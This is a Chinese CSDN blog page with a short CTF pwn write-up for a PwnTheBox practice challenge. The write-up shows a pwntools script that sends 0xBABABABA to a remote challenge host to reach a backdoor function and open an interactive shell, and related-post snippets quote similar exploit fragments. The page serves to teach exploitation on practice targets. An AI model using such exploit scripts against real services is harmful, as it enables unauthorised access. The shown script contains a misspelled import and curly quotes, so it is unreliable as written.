PwnTheBox pwn题学习笔记

最新推荐文章于 2024-03-05 22:18:37 发布

m0_68381884

最新推荐文章于 2024-03-05 22:18:37 发布

阅读量589

点赞数

文章标签：网络安全

本文链接：https://blog.csdn.net/m0_68381884/article/details/123624030

版权

本文介绍了如何使用IDA64进行文件分析，通过checksec检查保护措施，并展示了反编译后的C代码。重点在于理解当buf值为0xBABABABA时触发的backdoor函数，以及编写exploit的过程。最终给出了使用Python的pwn库发送payload并进行交互的exploit代码。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

tutorial1

我们拿到手一个文件后使用Ubuntu，用file来查看一下文件格式。

文件为64-bit，我们打开IDA64，并将文件拖进去。 checksec命令可以用来查看该文件有哪些保护措施。

接下来是IDA反编译之后的伪c代码，然后查看mijie

-1162167622转化成16进制后为0xBABABABA

当buf的值为0xBABABABA时，函数会跳转到backdoor函数

我们双击backdoor可以得到

接下来写exploit

from pwn improt *
context(log_level='debug')
p = remote(“redirect.do-not-trust.hacking.run”,10468)
payload = 0xBABABABA
p.sendline(p64(payload))
p.recv()
p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

m0_68381884

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

PwnTheBox(web篇)简单题

飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘

04-26

3176

PwnTheBox(web篇)简单题第一页 exec1 hackergame2019-签到题网页读取器管理员本地访问下载下载快速计算该网站已经被黑 PwnTheBox 百度网盘分享链接 Get Post 睿智题目一道很奇怪的题目奇葩的题目验证码 XSS 达拉崩吧大冒险 atchap php是世界上最好的语言 exec2 第二页 Twice SQL Injection 猫咪银行黑曜石浏览器信息安全

3.nc在PWN中的使用

admin的博客

09-15

4234

一、NC的基本知识。 NC:的使用：nc的全名是netcat，其主要用途是建立和监听任意TCP和UDP连接，支持ipv4和ipv6。因此，它可以用来网络调试、端口扫描等等。网络调试——测试端口号能否连接：nc -zv 主机的ip或域名端口号 -z告诉netcat，用户不想发送数据给主机，nc不用等待用户输入。 -v告诉netcat输出详细的交互过程。题目：打开kali的命令行：输入上面那一串指令。然后他会换行：不是卡住，而是在等待我们输入进一步的指令。 ...

1 条评论您还未登录，请先登录后发表或查看评论

CTF刷题网站汇总（包括本地可以自己搭建的）（1）

热门推荐

qq_51550750的博客

01-29

1万+

CTF刷题网站汇总（包括本地可以自己搭建的） CTF刷题平台汇总（欢迎各位师傅们补充）第一个当然是CTFshow啦！https://ctf.show/ 攻防世界 https://adworld.xctf.org.cn/ Bugku https://ctf.bugku.com/ 论剑场 https://new.bugku.com/ Buuctf https://buuoj.cn/ Jarvisoj https://www.jarvisoj.com/ 墨者学院 https://www.mozhe.cn/ 看雪

pwnbox:我的pwnbox

04-11

pwnbox 基于phusion / baseimage：18.04-1.0.0-amd64的用于pwn ctf挑战或利用dev的docker环境用法 git clone https://github.com/d3Xm/pwnbox cd pwnbox docker build -t pwnbox . docker run -d --rm -v /home/kali/shares/:/shares -p 23946:23946 --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -i pwnbox docker exec -it pwnbox /bin/bash 随附软件 -CTF框架和漏洞利用开发库 -pwn的gdb -PEDA-GDB的Python漏洞利用开发援助 [gdb-peda-intel]- -PEDA-

Pwn The Box——矛盾

龙狼刺的博客

08-11

132

可以看出关键点在于 is_numeric() 上，它会用于检测变量是否为数字或数字字符串，这里我们需要绕过它,只需要在num后面添加1a。

PwnTheBox

硫酸超的博客

11-30

1057

靶场地址右键查看源代码 <html> <head> <title>Welcome to PwnTheBox</title> <meta charset="utf-8"> </head> <body> <h3 align="center">欢迎来到PwnTheBox大学</h3> <p>PwnTheBox大学（PwnTheBox University）简称PTB，建校于5YWs5Y

BUUCTF pwn xp0intctf_2018_tutorial2

stareforever的博客

03-10

244

查看保护 pie没开 IDA打开查看程序流程序有后门函数backdoor 那么首先读入buf 4字节，使得buf的值为0xdeadbeef 然后再读入v4 4字节，这里使得v4的内容为backdoor的地址而程序是64位的，可以用p32进行输入完整ex from pwn import * context(log_level='debug') #io=process("./Xp0intCTF_2018_tutorial2") io=remote("node3.buuoj.cn",26963)

ctfshow pwn题学习笔记

Scarehehe的博客

11-30

6683

文章目录pwn入门pwn签到题pwn02 ctfshow pwn学习笔记(除堆部分)本菜逼不会堆 pwn入门 pwn签到题 nc 直接连 pwn02 查看保护进入pwnme函数发现fgets处存在栈溢出,s距离ebp为0x9,那么覆盖到返回地址的长度还要再加上0x4我是懒狗,没有gdb看,且程序中存在后门函数,地址为0x804850f exp: from pwn import * io = process("./stack") payload = b"a"*(0x9+0x4)+p32(0x804

CTF Blind pwn题型学习笔记

lifanxin的博客

08-31

2284

Blind pwn概述如何辨别漏洞类型逻辑漏洞盲打格式化字符串盲打原理阐述例题讲解axb_2019_fmt32栈溢出盲打堆盲打总结概述所谓Blind pwn，即是在无法获得二进制程序文件的情况下对题目进行漏洞利用。这篇博客主要是将见到过的盲打pwn题做一个总结，大概可以分为以下几类盲打pwn题：逻辑漏洞盲打、格式化字符串盲打、栈溢出盲打、堆盲打。如何辨别漏洞类型对于盲打题，首先第一步应该是判断属于哪种类型的盲打，判断的步骤也很简单，nc连上后，直接看程序提供的菜单功能。一般来说，需要逻

Pwn学习路线及学习笔记以及gem安装

10-15

Pwn学习路线及学习笔记 Pwn是计算机安全领域中的一个重要方向，旨在研究和学习 Binary Exploitation，CTF 等安全知识。本文将从Pwn学习路线及学习笔记入手，总结作者在学习Pwn过程中的心得体会和经验。一、前期...

pwn学习笔记（5）--格式化字符串漏洞（未完全完成）

最新发布

qq_66013948的博客

03-05

1554

格式化字符串函数可以接收可变数量的参数，并将第一个参数作为格式化字符串，根据其来解析之后的参数格式化字符串函数格式化字符串[后续参数]

pwnbox:有关如何创建自己的Pwnbox（最初由HTB创建）的说明

05-10

Pwnbox 对于使用Kali的用户，我在底部添加了一些步骤以在2020.3中获得新的zsh终端，以显示您的服务器/ IP 是否想复制Hack Box自己的Pwnbox？请遵循以下指南！这应该为您提供Hack The Box使用的pwnbox的“外观”。此处显示的所有内容都可以在您自己的Parrot OS中完成，无论是VM还是主OS。但是，我建议您研究每个命令的功能，执行的位置以及如何根据自己的喜好自定义它。对我来说，每当我进入Parrot机器时，它就会带给我有趣的hackthebox徽标。继续，自己做吧！ █ █ ▐▌ ▄█▄ █ ▄▄▄▄ █▄▄█ ▀▀█ █▀▀ ▐▌▄▀ █ █▀█ █▀█ █▌▄█ ▄▀▀▄ ▀▄▀ █ █ █▄█ █▄▄ ▐█▀▄ █ █ █ █▄▄ █▌▄█

pwn学习笔记 BUU

2301_79525044的博客

01-11

630

本来配完20和22以后以为自己已经会配基本的环境了，结果18又让我看到了很多新的问题。搜出来的文章大部分都没用，找到有用的文章也忘记保存了，以后如果有缘要重新配环境应该会吃很多亏。之前一直没有做笔记，现在开始正式进入寒假学习。这Ubuntu18的问题比20和22多好多，不停的报错，报错方式不停地变，已经麻了。刚回家，一堆事要搞，没学什么，主要还是配环境。

Pwntools的context设置与shellcode

半岛铁盒的博客

02-27

5223

文章目录一、context二、汇编与shellcode简单的例子???? 一、context context 是 pwntools 用来设置环境的功能。在很多时候，由于二进制文件的情况不同，我们可能需要进行一些环境设置才能够正常运行exp，比如有一些需要进行汇编，但是32的汇编和64的汇编不同，如果不设置context会导致一些问题。一般来说我们设置context只需要简单的一句话: context(os='linux', arch='amd64', log_level='debug') 或者 con

writeup PwnTheBox baopo

The code way of kinnisoy

10-27

367

题目描述：根据题目，知道本题考察点为爆破。打开靶机，发现一个登录界面，随便登陆一下，告诉了我们用户名，且验证码为纯文本，且在响应数据包中可直接获取。那么只需要爆破密码就行， PS：经过测试，验证码由服务器生成，每次动态改变，burp爆破验证码这里有点不懂，遂直接用python实现，有了解的可以评论区告诉我一下。 F12大法好，一下发现两个关键点，验证码和密码格式。所以下面分为两步：从数据包中解析出验证码发包进行爆破解析验证码的代码如下： def get_code(response)

PwnTheBox--快速计算

Dream'

03-01

1447

一、问题描述打开题目之后，要求3秒之内计算一个式子，我们过三秒再刷新发现式子就发生了变化，这道题手算是不太可能了，考虑别的方法。二、解决问题使用python解决问题的大概思路如下： (1)先创建一个session对象。（因为计算出结果后需要再次发送数据，而session对象可以保留会话，第二次发送时带上第一次时的消息头） s = requests.Session() (2)使用session对象访问题目地址，并从中提取出需要计算的表达式。 r = s.get('http://11

CVE-2017-11826漏洞利用样本分析

zz_strive_2012的专栏

10-19

3219

2017年10月10日，微软在例行的月度补丁中修复了一个漏洞编号为CVE-2017-11826的在野Microsoft Office 0day 漏洞。鉴于CVE-2017-11826已存在在野利用案例，金睛安全研究团队发布安全预警，提醒广大用户及时修补漏洞。漏洞编号： CVE-2017-11826 漏洞影响软件： Microsoft Office Compatibil

关于memset函数。。。

weixin_30466039的博客

08-02

310

今天突然发现memset的原理，如memset(p,0,sizeof(p))，这句话特别常见，讲所有的元素初始化为0，但是memset(p,1,sizeof(p))，却是将所有的元素初始化为16843009，以前也知道不能初始化为1，但是原因就不得而知了。那天研究别人代码，发现一句相当于是memset(p,243,sizeof(p))的语句，却是把整个数组赋值为-202116109，...

pwnthebox pwn ciscn_2019_n_1 wp

weixin_49436541的博客

03-13

516

ciscn_2019 pwn